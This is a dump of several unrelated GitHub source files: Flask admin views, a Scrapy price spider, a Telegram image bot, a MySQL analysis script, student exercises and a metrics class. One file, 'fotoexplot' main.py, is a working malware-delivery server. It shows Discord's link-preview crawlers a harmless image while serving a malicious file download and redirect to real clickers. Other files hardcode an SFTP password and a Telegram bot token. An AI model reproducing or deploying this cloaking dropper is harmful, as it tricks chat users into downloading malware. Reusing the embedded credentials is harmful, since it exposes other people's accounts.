redirect(url_for('.display_membership_types'))\n return render_template('admin/edit_membership_type.html', form=form)\n\n\n@main.route('/membership-types/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_membership_type(id):\n mtype = MembershipType.query.get_or_404(id)\n form = EditMembershipTypeForm()\n\n if form.validate_on_submit():\n mtype.name = form.name.data\n mtype.length = form.length.data\n mtype.price = form.price.data\n\n db.session.commit()\n flash('Membership type successfully updated!')\n return redirect('/')\n\n form.name.data = mtype.name\n form.length.data = mtype.length\n form.price.data = mtype.price\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each facility to reach id before calling this method\n@main.route('/facilities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_facility(id):\n facility = Facility.query.get_or_404(id)\n form = EditFacilityForm()\n\n if form.validate_on_submit():\n facility.name = form.name.data\n facility.capacity = form.capacity.data\n facility.description = form.description.data\n\n db.session.commit()\n flash('Facility successfully updated!')\n return redirect('/')\n\n form.name.data = facility.name\n form.capacity.data = facility.capacity\n form.description.data = facility.description\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each activity to reach id before calling this method\n@main.route('/activities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_activity(id):\n activity = Activity.query.get_or_404(id)\n form = EditActivityForm()\n\n if form.validate_on_submit():\n activity.activity_name = form.activity_name.data\n activity.activity_staff_id = form.activity_staff_id.data\n activity.activity_price = form.activity_price.data\n activity.facility_id = form.facility_id.data\n\n db.session.commit()\n flash('Activity successfully updated!')\n return redirect(url_for('.display_activities'))\n\n form.activity_name.data = activity.activity_name\n form.activity_staff_id.data = activity.activity_staff_id\n form.activity_price.data = activity.activity_price\n form.facility_id.data = activity.facility_id\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n# Display method to display the list of activities to get to the edit function\n@main.route('/activities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_activity(id):\n activities = db.session.query(Activity).all()\n\n if not activities:\n flash('No results found!')\n return redirect('/')\n else:\n table = ActivityTable(activities)\n table.border = True\n return render_template('admin/display_activity.html', table=table)\n\n\n@main.route('/facilities/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_facility(id):\n facilities = db.session.query(Facility).all()\n\n if not facilities:\n flash('No results found!')\n return redirect('/')\n else:\n table = FacilityTable(facilities)\n table.border = True\n return render_template('admin/display_facility.html', table=table)\n","repo_name":"HollowMan6/Answers-for-My-Leeds-COMP2-Courses","sub_path":"COMP2913/Master/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":33202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25062752113","text":"import requests, io\nfrom flask import Flask, request, send_file\napp = Flask(\n__name__,\n template_folder='templates',\n static_folder='static'\n)\n@app.route('/', methods=['GET'])\ndef main():\n Image = 'https://e7.pngegg.com/pngimages/193/384/png-clipart-panda-panda.png' # Replace this with your image link\n Malicious = 'MaliciousFIleDownloadLink'# Replace this with your download link\n Redirect = \"RedirectLink\" # You can just put the image here or you can put a custom site. You can combine this with my clipboard logger and it'll be more op lol https://github.com/TheonlyIcebear/Clipboard-Javascript-Logger\n # This is to get the ip\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n ip = request.environ['REMOTE_ADDR']\n else:\n ip = request.environ['HTTP_X_FORWARDED_FOR']\n print(ip)\n if ip.startswith('35.') or ip.startswith('34.'):\n # If discord is getting a link preview send a image\n return send_file(\n io.BytesIO(requests.get(Image).content),\n mimetype='image/jpeg',\n download_name='AnyName.png')\n else:\n # If a real person is clicking the link send a malicious file and redirect back to the image\n return f''' \n '''+'''\n ''' # If the file doesn't download change the 500 to a higher number like 1000\nif __name__ == '__main__':\n # Run the Flask app\n app.run(\n host='0.0.0.0',\n debug=True,\n port=8080\n )\n","repo_name":"MematiBaskann/fotoexplot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20538059317","text":"\"\"\"\nOriginal ticket: https://www.assembla.com/spaces/competitormonitor/tickets/3926-express-gifts---spider-copy---dunelm#/activity/ticket:\nThis spider was copied from the Lakeland account\nThis spider downloads the csv file and extracts the products from the URLs.\nThe identifier/SKU is set from the CSV file.\n\"\"\"\nimport csv\nimport json\nimport re\nfrom tempfile import NamedTemporaryFile\nimport os\n\nimport paramiko\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.response import get_base_url\nfrom urlparse import urljoin\n\nfrom product_spiders.items import Product, ProductLoaderWithoutSpaces as ProductLoader\nfrom product_spiders.config import CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass DunelmSpider(BaseSpider):\n name = 'expressgifts-dunelm.com'\n allowed_domains = ['dunelm.com']\n start_urls = ['http://www.dunelm.com']\n\n def parse(self, response):\n transport = paramiko.Transport((CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT))\n username = \"expressgifts\"\n password = \"jqh3aMrK\"\n transport.connect(username = username, password = password)\n sftp = paramiko.SFTPClient.from_transport(transport)\n files = sftp.listdir_attr()\n \n f = NamedTemporaryFile(delete=True, suffix='.csv', prefix='expressgifts_dunelm_')\n sftp.get('express_gifts_flat_file.csv', f.name)\n\n with open(f.name) as csv_f:\n rows = csv.DictReader(csv_f)\n for row in rows:\n if row.get('DUNELM').strip():\n yield Request(row['DUNELM'].strip(), callback=self.parse_product,\n meta={'sku': row['PRODUCT_NUMBER']})\n\n f.close()\n \n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n \n loader = ProductLoader(selector=hxs, item=Product())\n loader.add_value('url', response.url)\n loader.add_xpath('brand', './/dt[text()=\"Brand\"]/following-sibling::dd[1]/text()')\n categories = hxs.select('.//div[contains(@class, \"breadcrumbs\")]//a/text()').extract()\n for category in categories:\n if 'search' in category.lower():\n continue\n loader.add_value('category', category)\n loader.add_value('sku', response.meta.get('sku', ''))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n if hxs.select('//article[@id=\"product\"]'):\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.replace_value('image_url', urljoin(base_url, image_url[0]))\n options = hxs.select('//script[@type=\"text/javascript\"]/text()[contains(., \"productData\")]').extract()\n for item in self.parse_options(hxs, base_url, loader, options):\n yield item\n \n for product in hxs.select('//article[@class=\"bdp-item\"]'):\n image_url = product.select('.//a[contains(@id, \"mainImage\")]/img/@src').extract()[0]\n loader.replace_value('image_url', urljoin(base_url, image_url))\n options = product.select('./div/div[1]//script[@type=\"text/javascript\"]/text()').extract()\n for item in self.parse_options(product, base_url, loader, options):\n yield item\n \n def parse_one_product(self, hxs, base_url, loader):\n if options:\n self.log('Options detected on %s' %loader.get_collected_values('url'))\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.add_value('image_url', urljoin(base_url, image_url[0]))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n loader.add_xpath('identifier', './/article[@id=\"product\"]/@data-product-id')\n loader.add_xpath('sku', './/article[@id=\"product\"]/@data-product-id')\n \n if not hxs.select('.//div[contains(@id, \"stock\")]//text()[contains(.,\"in-stock\")]') and hxs.select('//span[contains(@id, \"standardIcon\")]/@class[.=\"icon availability unavailable\"]'):\n loader.add_value('stock', 0)\n loader.add_xpath('price', './/strong[@id=\"fromPrice\"]/text()')\n product = loader.load_item()\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n return product\n\n def parse_options(self, hxs, base_url, loader, options):\n regx = re.compile('productData(?!.*productData).*? = ({.+})', re.S)\n options = options[0]\n options = json.loads(re.findall(regx, options)[0])\n # name = loader.get_output_value('name')\n for variant in options['skus']:\n loader.replace_value('identifier', variant['id'])\n # loader.replace_value('sku', variant['id'])\n loader.replace_value('price', variant['price'])\n loader.replace_value('name', variant['name'].replace('"', '\"'))\n # option_name = ''\n for attribute in variant['attributes']:\n # option_name += u'{} '.format(attribute['value'])\n if attribute['name'] == 'Colour':\n colour = attribute['value']\n try:\n loader.replace_value('image_url', urljoin(base_url, options['colour'][colour]))\n except:\n pass\n # option_name = option_name.strip()\n product = Product(loader.load_item())\n # product['name'] += u' {}'.format(option_name)\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n formdata = {'dataType':'json', 'quantity':'1', 'storeId':'10151',\n 'productId':variant['identifier'], 'sku':variant['id']}\n #self.log('Url %s. Formdata %s' %(base_url, formdata))\n yield FormRequest('http://www.dunelm.com/webapp/wcs/stores/servlet/AjaxProductAvailabilityView',\n formdata=formdata,\n meta={'product':product, 'tries':1}, callback=self.parse_stock)\n\n def parse_stock(self, response):\n tries = response.meta['tries']\n try:\n stock = json.loads(response.body)\n self.log('Success with %d tries' %tries)\n except:\n tries+=1\n if tries > 50:\n self.log('Gave up retrying stock status for %s' %response.request.headers['Referer'])\n yield response.meta['product']\n return\n self.log('Trying %d get stock status' %tries)\n yield response.request.replace(dont_filter=True, \n meta={'product':response.meta['product'], 'tries':tries})\n return\n deliveries = ('expressAvailableClass', 'rocsAvailableClass', 'standardAvailableClass')\n product = response.meta['product']\n product['stock'] = 0\n for delivery in deliveries:\n if stock[delivery] == \"available\":\n del product['stock']\n break\n\n yield product\n ","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/express_gifts/dunelm.py","file_name":"dunelm.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20339028729","text":"import telebot\nfrom telebot import types\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom PIL import ImageOps\nimport os\nimport time\n\n\nbot = telebot.TeleBot('6974578088:AAE-qBT6FVPesqpH6WcDTa61TJaXwTyyO_o')\nproject_folder = \"/Users/Fedor/PycharmProjects/2kurs\"\n\nglobal ind\nind = 0\n\n\ndef delete_jpg_files(folder_path):\n try:\n files = os.listdir(folder_path)\n\n jpg_files = [file for file in files if file.endswith(\".jpg\")]\n\n for jpg_file in jpg_files:\n file_path = os.path.join(folder_path, jpg_file)\n os.remove(file_path)\n print(f\"Удален файл: {file_path}\")\n\n except Exception as e:\n print(f\"Произошла ошибка при удалении файлов: {e}\")\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn1 = types.KeyboardButton(text='/start')\n btn2 = types.KeyboardButton(text='/help')\n keyboard.add(btn1, btn2)\n bot.send_message(message.chat.id, text='выберите функцию', reply_markup=keyboard)\n\n\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n k_b = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn3 = types.KeyboardButton(text='/reverse_photo')\n btn4 = types.KeyboardButton(text='/blur_photo')\n btn5 = types.KeyboardButton(text='/negative_photo')\n k_b.add(btn3)\n k_b.add(btn4)\n k_b.add(btn5)\n bot.send_message(message.chat.id, text='Выберите обработку', reply_markup=k_b)\n\n\n@bot.message_handler(commands=['reverse_photo'])\ndef reverse(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, r_photo)\n\n\ndef r_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n im = im.transpose(Image.FLIP_LEFT_RIGHT)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n@bot.message_handler(commands=['blur_photo'])\ndef blur(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, b_photo)\n\n\ndef b_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n for i in range(100):\n im = im.filter(ImageFilter.BLUR)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\n\n\n\n\n\n@bot.message_handler(commands=['negative_photo'])\ndef negative(message):\n msg = bot.send_message(message.chat.id, \"Send photo\")\n bot.register_next_step_handler(msg, n_photo)\n\n\ndef n_photo(message):\n global ind\n ind += 1\n file_id = message.photo[-1].file_id\n file_info = bot.get_file(file_id)\n file_path = file_info.file_path\n downloaded_file = bot.download_file(file_path)\n\n with open('saved_photo' + str(ind) + '.jpg', 'wb') as new_file:\n new_file.write(downloaded_file)\n\n im = Image.open('saved_photo' + str(ind) + '.jpg')\n\n im = ImageOps.invert(im)\n\n bot.send_photo(message.chat.id, im)\n\n time.sleep(10)\n delete_jpg_files(project_folder)\n\n\nbot.polling(none_stop=True, interval=0)\n","repo_name":"ZdobnyakovGT/Zdobnyakov_Labs_IU5-34B","sub_path":"HW.py","file_name":"HW.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35720588608","text":"#!/usr/bin/env python3\nimport MySQLdb as mysql\nimport json\nimport os\nimport sys\nfrom statistics import pstdev, stdev \n\ndb_config = json.loads(sys.argv[1])\nstart_date = sys.argv[2]\n\nmysql_connection = mysql.connect(database=db_config['database'], user=db_config['username'], password=db_config['password'])\ncursor = mysql_connection.cursor()\n\ndef get_sit_times():\n cursor.execute(\"\"\"select bookings.id, bookings.car_id, booking_details.type, booking_details.longitude,\n booking_details.latitude, booking_details.created_at, bookings.user_id from bookings\n join booking_details on bookings.id = booking_details.booking_id \n where date(bookings.created_at) > date(\"{}\") \n and hour(bookings.created_at) between 7 + 7 and 20 + 7 \n order by car_id desc, bookings.created_at asc\n ;\"\"\".format(start_date))\n\n line = cursor.fetchone()\n\n i = 1\n end_time = 0\n sit_time = []\n mult = 200.0\n \n while line:\n if i == 1:\n i+=1\n line = cursor.fetchone()\n else:\n carId = line[1]\n while line and line[1] == carId:\n if line[2] == 'end':\n end_time = line[5]\n long_end = round(line[3] * mult) / mult\n lat_end = round(line[4] * mult) / mult\n else:\n start_time = line[5]\n try:\n time_between = start_time - end_time\n time_between = 0\n \n long_start= round(line[3] * mult) / mult\n lat_start = round(line[4] * mult) / mult\n if long_start == long_end and lat_start == lat_end:\n sit_time += [(round(line[4]*2 * mult)/(2 * mult), round(line[3]*2 * mult)/(2 * mult), time_between.seconds, line[0], line[6])]\n except:\n pass\n i += 1\n line = cursor.fetchone()\n\n line = cursor.fetchone()\n averages = {}\n for i in sit_time:\n points = (round(i[0]*2 * mult)/(2 * mult) , round(i[1]*2 * mult)/(2 * mult))\n seconds = i[2]\n if points in averages:\n averages[points] += [seconds]\n else:\n averages[points] = [seconds]\n \n for i in averages.keys():\n av = sum(averages[i])/len(averages[i])\n averages[i] = [av, len(averages[i])]\n \n \n real_sit_time= []\n for i in averages.keys():\n long = i[0]\n lat = i[1]\n time = averages[i][0]\n freq = averages[i][1]\n real_sit_time += [(long, lat, time, freq)]\n \n \n \"\"\"\n with open(\"/var/log/outgoing/sit-time-points.js\", \"w\") as outfile: \n outfile.write(\"{}{}\".format(\"var points=\", json.dumps(real_sit_time)))\n # The indicies in the subarray are [lat, lng, sit_time, booking_id, user_id]\n \"\"\"\n return sit_time\n #return list(map(lambda x: x[2], sit_time))\n\ndef get_standard_deviation(sit_times):\n only_times = list(map(lambda x: x[2], sit_times))\n return stdev(only_times)\n\ndef get_outlier_bookings(standard_deviation, sit_times, percent_outside_accepted):\n outliers = list(filter(lambda x: abs(standard_deviation - x[2]) > standard_deviation + ((percent_outside_accepted / 100) * standard_deviation) , sit_times))\n return outliers\n\ndef outliers_by_user(booking_list):\n outliers_counts = {}\n for user in booking_list:\n if user[4] in outliers_counts:\n outliers_counts[user[4]] += 1\n else:\n outliers_counts[user[4]] = 1\n users_list = list(filter(lambda x: outliers_counts[x], outliers_counts))\n users_list = list(map(lambda x: str(x), users_list))\n query = \"select id, first_name, last_name from users where id in ({});\".format(\", \".join(users_list))\n cursor.execute(query)\n user_names = {a : (b, c) for a, b, c in cursor}\n query = \"select user_id, count(id) from bookings where user_id in ({}) group by user_id;\".format(\", \".join(users_list))\n cursor.execute(query)\n bookings_counts = {a : b for a, b in cursor}\n user_ratios = {}\n for key in outliers_counts:\n user_ratios[key] = {\n \"ratio\": outliers_counts[key] / bookings_counts[key],\n \"bookings\": bookings_counts[key],\n \"outliers\": outliers_counts[key]\n }\n output = {}\n for user in user_names:\n output[user_names[user]] = user_ratios[user]\n\n return user_ratios\n\nif __name__ == \"__main__\":\n sit_times = get_sit_times()\n standard_deviation = get_standard_deviation(sit_times)\n outliers = get_outlier_bookings(standard_deviation, sit_times, 0)\n users_with_outliers = outliers_by_user(outliers) \n print(json.dumps(users_with_outliers))\n mysql_connection.close()\n\n","repo_name":"WaiveCar/Waivecar","sub_path":"analysis/sitTimes.py","file_name":"sitTimes.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7328566749","text":"xcount = 0\nycount = 0\n\nread = []\n\nwith open('December2.txt') as file:\n\tfor line in file:\n\t\tline = line.split(\" \")\n\t\tread.append(line)\n\t\tif line[0] == \"forward\":\n\t\t\txcount += int(line[1])\n\t\tif line[0] == \"down\":\n\t\t\tycount -= int(line[1])\n\t\tif line[0] == \"up\":\n\t\t\tycount += int(line[1])\n\nprint(xcount * abs(ycount))\n\nposition = 0\ndepth = 0\naim = 0\n\nfor i in range(len(read)):\n\tif read[i][0] == \"forward\":\n\t\tdepth += (aim * int(read[i][1]))\n\t\tposition += int(read[i][1])\n\tif read[i][0] == \"down\":\n\t\taim += int(read[i][1])\n\tif read[i][0] == \"up\":\n\t\taim -= int(read[i][1])\n\t\t\nprint(position * depth)\n","repo_name":"eduardoloz/CCC","sub_path":"AdventOfCode/2-Dive/December2.py","file_name":"December2.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41558741430","text":"class LinearSearch:\n\n\n def search(self,list,n):\n\n for i in range(len(list)):\n if list[i]==n:\n return True\n return False\n\n\n\nlist = [1,2,3,4,5]\nobj=LinearSearch();\nresult =obj.search(list,7);\nif result:\n print(\"found\")\nelse:\n print(\"not found\")","repo_name":"Mohit0888/Variables","sub_path":"variable/linearSearch.py","file_name":"linearSearch.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70507793372","text":"# Напишите программу, которой на вход подается последовательность чисел через пробел, а также\r\n# запрашивается у пользователя любое число.\r\n# В качестве задания повышенного уровня сложности можете выполнить проверку соответствия указанному\r\n# в условии ввода данных.\r\n# Далее программа работает по следующему алгоритму:\r\n# --Преобразование введённой последовательности в список\r\n# --Сортировка списка по возрастанию элементов в нем(для реализации сортировки определите функцию)\r\n# --Устанавливается номер позиции элемента, который меньше введенного пользователем числа, а следующий\r\n# за ним больше или равен этому числу.\r\n#\r\n# При установке позиции элемента воспользуйтесь алгоритмом двоичного поиска, который был рассмотрен в\r\n# этом модуле. Реализуйте его также отдельной функцией.\r\n#\r\n# Подсказка\r\n# Помните, что у вас есть числа, которые могут не соответствовать заданному условию. В этом случае необходимо\r\n# вывести соответствующее сообщение.\r\n\r\n# можно выбрать: вводим числа с клавиатуры или загружаем из файла\r\n\r\nimport sys\r\n\r\ndef sort(L):\r\n for i in range(len(L)):\r\n idx_min = i\r\n for j in range(i, len(L)):\r\n if L[j] < L[idx_min]:\r\n idx_min = j\r\n if i != idx_min:\r\n L[i], L[idx_min] = L[idx_min], L[i]\r\n return L\r\n\r\ndef search(L, num, left, right):\r\n if left > right:\r\n return False\r\n middle = (right + left) // 2\r\n if L[middle] == num:\r\n return middle\r\n elif num < L[middle]:\r\n return search(L, num, left, middle - 1)\r\n else:\r\n return search(L, num, middle + 1, right)\r\n\r\n\r\n# алфавит допустимых символов\r\nsymbols = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '-', ' ', '\\n')\r\n\r\ninput_str = '' # здесь храним введенную строку\r\nerror_symbol = '' # переменная для хранения неверных символов\r\nmy_str = ''\r\n\r\nanswer = input(\"Данные возьмем из файла (1) или введем с клавиатуры (2)?\\n\")\r\nif answer == '1':\r\n file_name = input('Введите имя файла с последовательностью чисел ')\r\n try:\r\n with open(file_name) as file:\r\n my_str = file.readline()\r\n except FileNotFoundError:\r\n print('Файл не найден')\r\n exit()\r\nelif answer == '2':\r\n print('Введите последовательность чисел через пробел.')\r\n my_str = sys.stdin.readline()\r\nelse:\r\n print('При следующем запуске программы введите \"1\" или \"2\"\\nЗавершаем работу...')\r\n exit()\r\n\r\nfor char in my_str:\r\n if char in symbols:\r\n input_str += char\r\n else:\r\n error_symbol += char\r\nif error_symbol:\r\n print('Вы ввели недопустимые символы: \"' + error_symbol + '\"')\r\n\r\n# если пользователь поставил минус после числа\r\ntry:\r\n list_of_numbers = list(map(float, input_str.split()))\r\nexcept ValueError:\r\n print('Символ \"-\" должен находиться перед числом\\nЗавершаем работу...')\r\n exit()\r\n\r\n# вводим число и добавляем его к списку\r\nnumber = float(input('Введите число: \\n'))\r\nprint('Список до сортировки: ' + str(list_of_numbers))\r\nlist_of_numbers.append(number)\r\n\r\n# сортируем\r\nlist_of_numbers = sort(list_of_numbers)\r\n\r\n# ищем позицию числа, введенного пользователем\r\npoz = search(list_of_numbers, number, 0, len(list_of_numbers))\r\nif poz == 0:\r\n print('Введенное число является минимальным среди чисел последовательности') # поэтому\r\n # не удовлетворяет нашим условиям\r\nelif list_of_numbers[-1] == number and list_of_numbers[-1] != list_of_numbers[-2]:\r\n print('Введенное число является максимальным среди чисел последовательности') # и после него нет числа,\r\n # равного введенному, поэтому не удовлетворяет нашим условиям\r\nelse:\r\n while list_of_numbers[poz] == list_of_numbers[poz - 1]:\r\n poz -= 1\r\n print(f'Индекс элемента списка, который меньше числа {number}: ' + str(poz - 1))\r\nlist_of_numbers.pop(poz)\r\nprint('Список после сортировки: ' + str(list_of_numbers))\r\n","repo_name":"ivmiller/HomeWork","sub_path":"1791-2.py","file_name":"1791-2.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43250331877","text":"import argparse\nimport subprocess\n\n# usage: python main.py \"filepathtogradebook\" \"filepathtomajors\" \"filepathtoresults\" \"gradebook_studentid\" \"gradebook_assignment\" \"major_studentid\" \"major_name\" lowerthresholdinclusive higherthresholdexclusive\ndef get_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('gradebook')\n\tparser.add_argument('majorlist')\n\tparser.add_argument('range_results')\n\tparser.add_argument('grade_id')\n\tparser.add_argument('grade_column')\n\tparser.add_argument('major_id')\n\tparser.add_argument('major_column')\n\tparser.add_argument('lower_threshold', type=float)\n\tparser.add_argument('higher_threshold', type=float)\n\treturn parser.parse_args()\n\t\n# runs both range.py and pie.py so as to simplify process for user\ndef main():\n\targs = get_arguments()\n\tsubprocess.run([\"python\", \"range.py\", args.gradebook, args.majorlist, args.range_results, args.grade_id, args.grade_column, args.major_id, args.major_column, str(args.lower_threshold), str(args.higher_threshold)])\n\tsubprocess.run([\"python\", \"pie.py\", args.range_results, args.grade_column, str(args.lower_threshold), str(args.higher_threshold)])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"Amndeep7/DrexelCSDepartmentAnalysisTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38819414985","text":"import sqlite3\r\ndb = sqlite3.connect('python_programming_db')\r\ncursor = db.cursor() # Get a cursor object\r\n\r\ncursor.execute('''\r\n DROP TABLE IF EXISTS Student;\r\n''')\r\n\r\ncursor.execute(''' \r\n CREATE TABLE IF NOT EXISTS Student\r\n (\r\n id INTEGER PRIMARY KEY, \r\n name TEXT,\r\n grade INTEGER\r\n );\r\n''')\r\ndb.commit()\r\n\r\n# Inserting students\r\ncursor.execute('''\r\n INSERT INTO Student\r\n (\r\n id,\r\n name, \r\n grade\r\n )\r\n VALUES\r\n (\r\n 55,\r\n 'Carl Davis',\r\n 61\r\n ),\r\n (\r\n 66,\r\n 'Dennis Fredrickson',\r\n 88\r\n ),\r\n (\r\n 77,\r\n 'Jane Richards',\r\n 78\r\n ),\r\n (\r\n 12,\r\n 'Peyton Sawyer',\r\n 45\r\n ),\r\n (\r\n 2,\r\n 'Lucas Brooke',\r\n 99\r\n )\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Select all records with grade between 60 and 80\r\ncursor.execute('''\r\n SELECT * FROM Student\r\n WHERE\r\n grade BETWEEN 60 AND 80;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Update Carl Davis' grade to 65\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 65\r\n WHERE\r\n name = 'Carl Davis';\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Delete Dennis Fredrickson's row\r\ncursor.execute('''\r\n DELETE FROM Student\r\n WHERE\r\n name = 'Dennis Fredrickson'\r\n''')\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\n# Change the grade of all people with an id less than 55\r\ncursor.execute('''\r\n UPDATE Student\r\n SET grade = 1\r\n WHERE\r\n id < 55;\r\n ''')\r\ndb.commit()\r\n\r\n# Print all records in Student\r\ncursor.execute('''\r\n SELECT * FROM Student;\r\n ''')\r\nquery_student = cursor.fetchall()\r\nprint(query_student)\r\n\r\ndb.close()\r\nprint('Connection to database closed')\r\n","repo_name":"ehmtang/SE-Bootcamp-HyperionDev","sub_path":"T47 - SQLite/database_manip.py","file_name":"database_manip.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69980423772","text":"import copy\nimport warnings\nimport numpy as np\nimport torch\n\nfrom graph4nlp.pytorch.modules.evaluation.base import EvaluationMetricBase\n\n\nclass Accuracy(EvaluationMetricBase):\n \"\"\"\n Calculate precision, recall, F1 for each labels\n\n Parameters\n ----------\n metrics: list\n Indicate the metric for the class to return.\n Note that each metric must be one of ``precision``, ``recall``, ``F1``, ``accuracy``.\n And the results' order is the same as the metrics.\n \"\"\"\n\n def __init__(self, metrics):\n super().__init__()\n if isinstance(metrics, list):\n for metric in metrics:\n if metric not in [\"precision\", \"recall\", \"F1\", \"accuracy\"]:\n raise TypeError(\n \"argument metric must be list of str containing \"\n \"'precision', 'recall', 'F1', 'accuracy'\"\n )\n self.metrics = metrics\n\n def calculate_scores(\n self, ground_truth, predict, average=None, zero_division=\"warning\", sample_weight=None\n ):\n \"\"\"\n The function to calculate the expected metrics for each labels\n\n Parameters\n ----------\n ground_truth: torch.Tensor\n Ground truth (correct) target values, 1d tensor\n predict: torch.Tensor\n The predicted target values generated by classifier, 1d tensor\n average: string or None, [None (default), 'micro', 'macro', 'weighted']\n If set ``None``, it will return the scores for each class.\n Otherwise, it will be reduced by the strategy as follows:\n\n ``'micro'``:\n Calculate metrics globally by counting the total true positives,\n false negatives and false positives.\n\n ``'macro'``:\n Calculate metrics for each label, and calculate the unweighted\n average values. This does not take label imbalance into account.\n\n ``'weighted'``:\n Calculate metrics for each label, and calculate the weighted\n average value. Note that the weight is the number of the true\n instances for each label.\n\n zero_division: \"warning\", 0, 1, default=\"warning\"\n Sets the value to return when there is a zero division.\n\n If set to \"warning\", this acts as 0, but warnings are also raised.\n\n sample_weight: None\n The sample weight. It is not implemented yet.\n\n Returns\n -------\n scores: list[object]\n Return the expected metrics initialized in init function in ``precision``, ``recall``, \\\n ``F1`` order\n \"\"\"\n ground_truth_np, predict_np = self._check_available(ground_truth, predict, zero_division)\n\n # calculate accuracy\n scores = ground_truth_np == predict_np\n accuracy_score = np.average(scores)\n\n if self.metrics is [\"precision\"]:\n return [accuracy_score]\n\n mcm = self._calculate_confusion_matrix(ground_truth=ground_truth_np, predict=predict_np)\n\n tp_sum = mcm[:, 1, 1]\n pred_sum = tp_sum + mcm[:, 0, 1]\n gt_sum = tp_sum + mcm[:, 1, 0]\n\n if average == \"micro\":\n tp_sum = np.array([tp_sum.sum()])\n pred_sum = np.array([pred_sum.sum()])\n gt_sum = np.array([gt_sum.sum()])\n\n # calculate precision and recall\n precision = self._prf_divide(tp_sum, pred_sum, zero_division=zero_division)\n recall = self._prf_divide(tp_sum, gt_sum, zero_division=zero_division)\n\n # calculate F_beta\n 